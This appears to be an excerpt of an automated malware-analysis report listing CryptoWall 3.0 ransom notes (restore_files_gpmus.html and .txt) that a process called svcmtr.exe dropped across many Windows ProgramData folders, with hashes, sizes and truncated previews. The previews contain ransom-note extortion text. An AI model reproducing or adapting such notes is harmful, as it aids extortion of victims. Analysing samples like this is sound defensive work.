                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\WwanSvc\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\WwanSvc\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\eHome\logs\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\eHome\logs\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\eHome\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\eHome\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Oracle\Java\.oracle_jre_usage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Oracle\Java\installcache_x64\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Oracle\Java\installcache_x64\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Oracle\Java\javapath_target_415196\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Oracle\Java\javapath_target_415196\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Oracle\Java\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
